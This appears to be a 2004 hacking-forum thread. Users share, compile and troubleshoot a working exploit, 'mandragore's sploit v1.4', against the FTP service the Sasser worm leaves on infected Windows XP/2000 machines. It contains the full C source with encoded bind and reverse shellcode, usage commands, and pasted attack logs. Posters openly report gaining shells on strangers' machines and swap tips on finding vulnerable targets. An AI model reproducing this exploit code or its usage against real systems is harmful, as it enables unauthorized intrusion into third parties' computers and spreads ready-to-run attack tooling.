no luck here o.O

got someshell with XP but no succes for 2k at the moment
did some one success with 2k??

So, it does works if you use diff offset on one ip ?
Hope it does....
Thanks for the exploit & Compiling
edit:// it does work, thnx guys

it works on xp 5554

looks like if u choose the wrong OS the exploit crashes...we need to find a way to ident the OS first

i tried the check.exe but it seems that we need the port 135 open to ident the OS.


Anyway...its working

great tool


only when i try sending sploit... then he says timed out

OMG...i got a shell on the IP i tested..guess i'm just lucky..

cheers dude..this proves that the exploit works

if u dont use -p option it will bind to default port without netcat?
thorax u forgot to post the file

do we have to fill in our ip next to the shell port
sasser.exe -d xxx.xxx.xxx.xxx -P 400 -t 0
this should work?
do i need to make netcat listen now on port 400
can someone confirm
or if i dont use the -P option it will default on 5300
sasser.exe -d xxx.xxx.xxx.xxx -t 0

i think my isp is blocking this port already , i am scanning remote then i try and scan the same ip from my machine , :/ scanner cant pick it up

this is what I got lol

works :-)

thx mate

------

WOW hell yeah, tried 10, got 9 shells ... hoooot :-D

nice share, ill try it out

i got that one to.. except it just kept flooding with that shit.. for like 1 min then the speeker in my pc started beeping o.o

what we need its a way to ident the OS first!!!

very nice m8 go to take @ look at this

looks nice but iv yet to get a shell think its dead already lol

all i seem to get is

connected, sending exploit

then just stays on that screen lol

very strange or very dead hehe

anyone else haveing that prob..

thanks for this ecploits saser i test that

well.... i found some ip, but it hang allways on .... Connected, sending exploits...


no shell.... nothing happens next

whats wrong ? i used the autohax

I believe only the WINDOWS XP works... So ya gotta find a box thats XP...

going to give it a try
great job m8

its stupid,
always i have a shell but all the time i get this

[%] mandragore's sploit v1.3 for sasser.x
[.] launching attack on 69.xx.65.xx:5554..
[.] will try to put a bindshell on port 5300.
[.] using type 'w2k SP4 all'
[+] connected, sending exploit
[+] connected!

♀

RPC-3 Telnet Host
Revision F 4.20a, © 1999
Bay Technical Associates
Unit ID: RPC3

Enter username>Batchvorgang abbrechen (J/N)? n

D:\Eigene Dateien\Hackz\howtohack\lsass\sasser\auto>exploit.bat 69.xx.81.xx echo
69.12.81.10
[%] mandragore's sploit v1.3 for sasser.x
[.] launching attack on 69.xx.81.xx:5554..
[.] will try to put a bindshell on port 5300.
[.] using type 'wXP SP1 all'
[+] connected, sending exploit
[+] connected!

♀

RPC-3 Telnet Host
Revision F 5.00, © 2001
Bay Technical Associates
Unit ID: Chicago-69-12-81-10

Enter username>Batchvorgang abbrechen (J/N)? n
[%] mandragore's sploit v1.3 for sasser.x
[.] launching attack on xx.12.xx.10:5554..
[.] will try to put a bindshell on port 5300.
[.] using type 'w2k SP4 all'
[+] connected, sending exploit
[+] connected!

♀

RPC-3 Telnet Host
Revision F 5.00, © 2001
Bay Technical Associates
Unit ID: Chicago-69-12-81-10

Enter username>Batchvorgang abbrechen (J/N)? n

D:\Eigene Dateien\Hackz\howtohack\lsass\sasser\auto>exploit.bat 69.xx.xx.11 echo
69.12.81.11
[%] mandragore's sploit v1.3 for sasser.x
[.] launching attack on 69.xx.xx.11:5554..
[.] will try to put a bindshell on port 5300.
[.] using type 'wXP SP1 all'
[+] connected, sending exploit
[+] connected!

♀

RPC-3 Telnet Host
Revision F 5.01, © 2001
Bay Technical Associates
Unit ID: RPC3ago-69-12-81-11

Enter username>Batchvorgang abbrechen (J/N)? n
[%] mandragore's sploit v1.3 for sasser.x
[.] launching attack on xx.12.xx.11:5554..
[.] will try to put a bindshell on port 5300.
[.] using type 'w2k SP4 all'
[+] connected, sending exploit
[+] connected!

♀

RPC-3 Telnet Host
Revision F 5.01, © 2001
Bay Technical Associates
Unit ID: RPC3ago-69-12-81-11

Enter username>aa
aa
aa
aa
Batchvorgang abbrechen (J/N)? n

D:\Eigene Dateien\Hackz\howtohack\lsass\sasser\auto>exploit.bat 69.xx.81.xx echo
69.12.81.13
[%] mandragore's sploit v1.3 for sasser.x
[.] launching attack on 69.xx.81.xx:5554..
[.] will try to put a bindshell on port 5300.
[.] using type 'wXP SP1 all'
[+] connected, sending exploit
[+] connected!

♀

RPC-3 Telnet Host
Revision F 5.01, © 2001
Bay Technical Associates
Unit ID: Chicago-69-12-81-13

Enter username>Batchvorgang abbrechen (J/N)? n
[%] mandragore's sploit v1.3 for sasser.x
[.] launching attack on xx.12.xx.13:5554..
[.] will try to put a bindshell on port 5300.
[.] using type 'w2k SP4 all'
[+] connected, sending exploit
[+] connected!

♀

RPC-3 Telnet Host
Revision F 5.01, © 2001
Bay Technical Associates
Unit ID: Chicago-69-12-81-13

Enter username>

what is this?

//edit : sry ^^ i have del the ips

Grezz
Hyp3r

I believe that is from a router.

I'm not positive but I've seen that before with the lovegate exploit

Hyp3r you just broke forum rules. No posting actual ip addresses....in fact you just incriminated yourself for hacking ppl...nice one...i hope you are proxied here!

tsk tsk tsk

i tried it but it does not work very well

lol, now we can do what the bot has been doing for a week : \

hey thanks for the exploit and code!!!

Tnx m8 gonna look at this one now;)

now we need a checker that tell us if its xp machine or not and was SP cuz i still haven't had any luck think exploit bit pointless

thanx guys works fine for me
got in the first one i tried

for os checking the check.exe from cyrex lsass autohaxor does the job

check.exe did't really work anyway..could't connect for some reason

and the reason is ?
works fine for me hellraiseruk

I keep getting this

C:\Sploit>sasser -d xxx.x.xxx.xxx-P 9875 -t 0
[%] mandragore's sploit v1.3 for sasser.x
[.] launching attack on xxx.x.xxx.xxx:5554..
[.] will try to put a bindshell on port 9875.
[.] using type 'wXP SP1 all'
[+] connected, sending exploit

and it just hangs there, what am i doing wrong? as far as i can see every who has gotten a shell has been using the same command. It either just hangs or says connection refused or exploit probably failed...........

on my box he says connected! and then there`s nothing going on what am I doin wrong?

just bad luck you guys..

we doing the commands right though?

sasser -d 192.0.1.0 -P 9875 -t 0

is that right? and i don't need nc listening or anything right? the shell should just come up in the same window

New version 1.4 with new offsets by mandragore
-----------------------------------------------------------------------------------

_____ ____________
_________ / ___// ____/ ____/
/ ___/ __ \\__ \/ __/ / /
/ / / /_/ /__/ / /___/ /___
/_/ \____/____/_____/\____/

- ROMANIAN SECURITY RESEARCH 2004 -





sasser v[a-e] exploit (of its ftpd server)

exploit version 1.4, public

author: mandragore
date: Mon May 10 16:13:31 2004
vuln type: SEH ptr overwriting
greets: rosecurity team
discovery: edcba
note: sasser.e has its ftpd on port 1023
update: offsets

*/

#include <stdio.h>
#include <strings.h>
#include <signal.h>
#include <netinet/in.h>
#include <netdb.h>

#define NORM "\033[00;00m"
#define GREEN "\033[01;32m"
#define YELL "\033[01;33m"
#define RED "\033[01;31m"

#define BANNER GREEN "[%%] " YELL "mandragore's sploit v1.4 for " RED "sasser.x" NORM

#define fatal(x) { perror(x); exit(1); }

#define default_port 5554

struct { char *os; long goreg; long gpa; long lla;}
targets[] = {
// { "os", pop pop ret, GetProcAd ptr, LoadLib ptr },
{ "wXP SP1 many", 0x77BEEB23, 0x77be10CC, 0x77be10D0 }, // msvcrt.dll's
{ "wXP SP1 most others", 0x77C1C0BD, 0x77C110CC, 0x77c110D0 },
{ "w2k SP4 many", 0x7801D081, 0x780320cc, 0x780320d0 },
}, tsz;

unsigned char bsh[]={
0xEB,0x0F,0x8B,0x34,0x24,0x33,0xC9,0x80,0xC1,0xDD,0x80,0x36,0xDE,0x46,0xE2,0xFA,

0xC3,0xE8,0xEC,0xFF,0xFF,0xFF,0xBA,0xB9,0x51,0xD8,0xDE,0xDE,0x60,0xDE,0xFE,0x9E,

0xDE,0xB6,0xED,0xEC,0xDE,0xDE,0xB6,0xA9,0xAD,0xEC,0x81,0x8A,0x21,0xCB,0xDA,0xFE,

0x9E,0xDE,0x49,0x47,0x8C,0x8C,0x8C,0x8C,0x9C,0x8C,0x9C,0x8C,0x36,0xD5,0xDE,0xDE,

0xDE,0x89,0x8D,0x9F,0x8D,0xB1,0xBD,0xB5,0xBB,0xAA,0x9F,0xDE,0x89,0x21,0xC8,0x21,

0x0E,0x4D,0xB4,0xDE,0xB6,0xDC,0xDE,0xCA,0x6A,0x55,0x1A,0xB4,0xCE,0x8E,0x8D,0x36,

0xDB,0xDE,0xDE,0xDE,0xBC,0xB7,0xB0,0xBA,0xDE,0x89,0x21,0xC8,0x21,0x0E,0xB4,0xDF,

0x8D,0x36,0xD9,0xDE,0xDE,0xDE,0xB2,0xB7,0xAD,0xAA,0xBB,0xB0,0xDE,0x89,0x21,0xC8,

0x21,0x0E,0xB4,0xDE,0x8A,0x8D,0x36,0xD9,0xDE,0xDE,0xDE,0xBF,0xBD,0xBD,0xBB,0xAE,

0xAA,0xDE,0x89,0x21,0xC8,0x21,0x0E,0x55,0x06,0xED,0x1E,0xB4,0xCE,0x87,0x55,0x22,

0x89,0xDD,0x27,0x89,0x2D,0x75,0x55,0xE2,0xFA,0x8E,0x8E,0x8E,0xB4,0xDF,0x8E,0x8E,

0x36,0xDA,0xDE,0xDE,0xDE,0xBD,0xB3,0xBA,0xDE,0x8E,0x36,0xD1,0xDE,0xDE,0xDE,0x9D,

0xAC,0xBB,0xBF,0xAA,0xBB,0x8E,0xAC,0xB1,0xBD,0xBB,0xAD,0xAD,0x9F,0xDE,0x18,0xD9,

0x9A,0x19,0x99,0xF2,0xDF,0xDF,0xDE,0xDE,0x5D,0x19,0xE6,0x4D,0x75,0x75,0x75,0xBA,

0xB9,0x7F,0xEE,0xDE,0x55,0x9E,0xD2,0x55,0x9E,0xC2,0x55,0xDE,0x21,0xAE,0xD6,0x21,

0xC8,0x21,0x0E
};

unsigned char rsh[]={
0xEB,0x0F,0x8B,0x34,0x24,0x33,0xC9,0x80,0xC1,0xB6,0x80,0x36,0xDE,0x46,0xE2,0xFA,

0xC3,0xE8,0xEC,0xFF,0xFF,0xFF,0xBA,0xB9,0x51,0xD8,0xDE,0xDE,0x60,0xDE,0xFE,0x9E,

0xDE,0xB6,0xED,0xEC,0xDE,0xDE,0xB6,0xA9,0xAD,0xEC,0x81,0x8A,0x21,0xCB,0xDA,0xFE,

0x9E,0xDE,0x49,0x47,0x8C,0x8C,0x8C,0x8C,0x9C,0x8C,0x9C,0x8C,0x36,0xD5,0xDE,0xDE,

0xDE,0x89,0x8D,0x9F,0x8D,0xB1,0xBD,0xB5,0xBB,0xAA,0x9F,0xDE,0x89,0x21,0xC8,0x21,

0x0E,0x4D,0xB6,0xA1,0xDE,0xDE,0xDF,0xB6,0xDC,0xDE,0xCA,0x6A,0x55,0x1A,0xB4,0xCE,

0x8E,0x8D,0x36,0xD6,0xDE,0xDE,0xDE,0xBD,0xB1,0xB0,0xB0,0xBB,0xBD,0xAA,0xDE,0x89,

0x21,0xC8,0x21,0x0E,0xB4,0xCE,0x87,0x55,0x22,0x89,0xDD,0x27,0x89,0x2D,0x75,0x55,

0xE2,0xFA,0x8E,0x8E,0x8E,0xB4,0xDF,0x8E,0x8E,0x36,0xDA,0xDE,0xDE,0xDE,0xBD,0xB3,

0xBA,0xDE,0x8E,0x36,0xD1,0xDE,0xDE,0xDE,0x9D,0xAC,0xBB,0xBF,0xAA,0xBB,0x8E,0xAC,

0xB1,0xBD,0xBB,0xAD,0xAD,0x9F,0xDE,0x18,0xD9,0x9A,0x19,0x99,0xF2,0xDF,0xDF,0xDE,

0xDE,0x5D,0x19,0xE6,0x4D,0x75,0x75,0x75,0xBA,0xB9,0x7F,0xEE,0xDE,0x55,0x9E,0xD2,

0x55,0x9E,0xC2,0x55,0xDE,0x21,0xAE,0xD6,0x21,0xC8,0x21,0x0E
};

char verbose=0;

void setoff(long GPA, long LLA) {
int gpa=GPA^0xdededede, lla=LLA^0xdededede;
memcpy(bsh+0x1d,&gpa,4);
memcpy(bsh+0x2e,&lla,4);
memcpy(rsh+0x1d,&gpa,4);
memcpy(rsh+0x2e,&lla,4);
}

void usage(char *argv0) {
int i;

printf("%s -d <host/ip> [opts]\n\n",argv0);

printf("Options:\n");
printf(" -h undocumented\n");
printf(" -p <port> to connect to [default: %u]\n",default_port);
printf(" -s <'bind'/'rev'> shellcode type [default: bind]\n");
printf(" -P <port> for the shellcode [default: 5300]\n");
printf(" -H <host/ip> for the reverse shellcode\n");
printf(" -L setup the listener for the reverse shell\n");
printf(" -t <target type> [default 0]; choose below\n\n");

printf("Types:\n");
for(i = 0; i < sizeof(targets)/sizeof(tsz); i++)
printf(" %d %s\t[0x%.8x]\n", i, targets[i].os, targets[i].goreg);

exit(1);
}

void shell(int s) {
char buff[4096];
int retval;
fd_set fds;

printf("[+] connected!\n\n");

for (;;) {
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(s,&fds);

if (select(s+1, &fds, NULL, NULL, NULL) < 0)
fatal("[-] shell.select()");

if (FD_ISSET(0,&fds)) {
if ((retval = read(1,buff,4096)) < 1)
fatal("[-] shell.recv(stdin)");
send(s,buff,retval,0);
}

if (FD_ISSET(s,&fds)) {
if ((retval = recv(s,buff,4096,0)) < 1)
fatal("[-] shell.recv(socket)");
write(1,buff,retval);
}
}
}

void callback(short port) {
struct sockaddr_in sin;
int s,slen=16;

sin.sin_family = 2;
sin.sin_addr.s_addr = 0;
sin.sin_port = htons(port);

s=socket(2,1,6);

if ( bind(s,(struct sockaddr *)&sin, 16) ) {
kill(getppid(),SIGKILL);
fatal("[-] shell.bind");
}

listen(s,1);

s=accept(s,(struct sockaddr *)&sin,&slen);

shell(s);
printf("crap\n");
}

int main(int argc, char **argv, char **env) {
struct sockaddr_in sin;
struct hostent *he;
char *host; int port=default_port;
char *Host; int Port=5300; char bindopt=1;
int i,s,pid=0,rip;
char *buff;
int type=0;
char *jmp[]={"\xeb\x06","\xe9\x13\xfc\xff\xff"};

printf(BANNER "\n");

if (argc==1)
usage(argv[0]);

for (i=1;i<argc;i+=2) {
if (strlen(argv[i]) != 2)
usage(argv[0]);

switch(argv[i][1]) {
case 't':
type=atoi(argv[i+1]);
break;
case 'd':
host=argv[i+1];
break;
case 'p':
port=atoi(argv[i+1])?:default_port;
break;
case 's':
if (strstr(argv[i+1],"rev"))
bindopt=0;
break;
case 'H':
Host=argv[i+1];
break;
case 'P':
Port=atoi(argv[i+1])?:5300;
Port=Port ^ 0xdede;
Port=(Port & 0xff) << 8 | Port >>8;
memcpy(bsh+0x57,&Port,2);
memcpy(rsh+0x5a,&Port,2);
Port=Port ^ 0xdede;
Port=(Port & 0xff) << 8 | Port >>8;
break;
case 'L':
pid++; i--;
break;
case 'v':
verbose++; i--;
break;
case 'h':
usage(argv[0]);
default:
usage(argv[0]);
}
}

if (verbose)
printf("verbose!\n");

if ((he=gethostbyname(host))==NULL)
fatal("[-] gethostbyname()");

sin.sin_family = 2;
sin.sin_addr = *((struct in_addr *)he->h_addr_list[0]);
sin.sin_port = htons(port);

printf("[.] launching attack on %s:%d..\n",inet_ntoa(*((struct in_addr *)he->h_addr_list[0])),port);
if (bindopt)
printf("[.] will try to put a bindshell on port %d.\n",Port);
else {
if ((he=gethostbyname(Host))==NULL)
fatal("[-] gethostbyname() for -H");
rip=*((long *)he->h_addr_list[0]);
rip=rip^0xdededede;
memcpy(rsh+0x53,&rip,4);
if (pid) {
printf("[.] setting up a listener on port %d.\n",Port);
pid=fork();
switch (pid) { case 0: callback(Port); }
} else
printf("[.] you should have a listener on %s:%d.\n",inet_ntoa(*((struct in_addr
*)he->h_addr_list[0])),Port);
}

printf("[.] using type '%s'\n",targets[type].os);

// -------------------- core

s=socket(2,1,6);

if (connect(s,(struct sockaddr *)&sin,16)!=0) {
if (pid) kill(pid,SIGKILL);
fatal("[-] connect()");
}

printf("[+] connected, sending exploit\n");

buff=(char *)malloc(4096);
bzero(buff,4096);

sprintf(buff,"USER x\n");
send(s,buff,strlen(buff),0);
recv(s,buff,4095,0);
sprintf(buff,"PASS x\n");
send(s,buff,strlen(buff),0);
recv(s,buff,4095,0);

memset(buff+0000,0x90,2000);
strncpy(buff,"PORT ",5);
strcat(buff,"\x0a");
memcpy(buff+272,jmp[0],2);
memcpy(buff+276,&targets[type].goreg,4);
memcpy(buff+280,jmp[1],5);

setoff(targets[type].gpa, targets[type].lla);

if (bindopt)
memcpy(buff+300,&bsh,strlen(bsh));
else
memcpy(buff+300,&rsh,strlen(rsh));

send(s,buff,strlen(buff),0);

free(buff);

close(s);

// -------------------- end of core

if (bindopt) {
sin.sin_port = htons(Port);
sleep(1);
s=socket(2,1,6);
if (connect(s,(struct sockaddr *)&sin,16)!=0)
fatal("[-] exploit most likely failed");
shell(s);
}

if (pid) wait(&pid);

exit(0);
}

even the command

C:\hack\sasser.exe -d [TARGET] -p 5554 gives me shells.

I've turned off my firewall and other AV software.....

goodluck guys..

i can not compile that because i have not all the include and it's so time to download every file that miss

Will post once I get it compiled

Never mind, I see its already been posted

NO luck here either , just get Connected .. and stops rite there ..

Does OS matter ?

Thx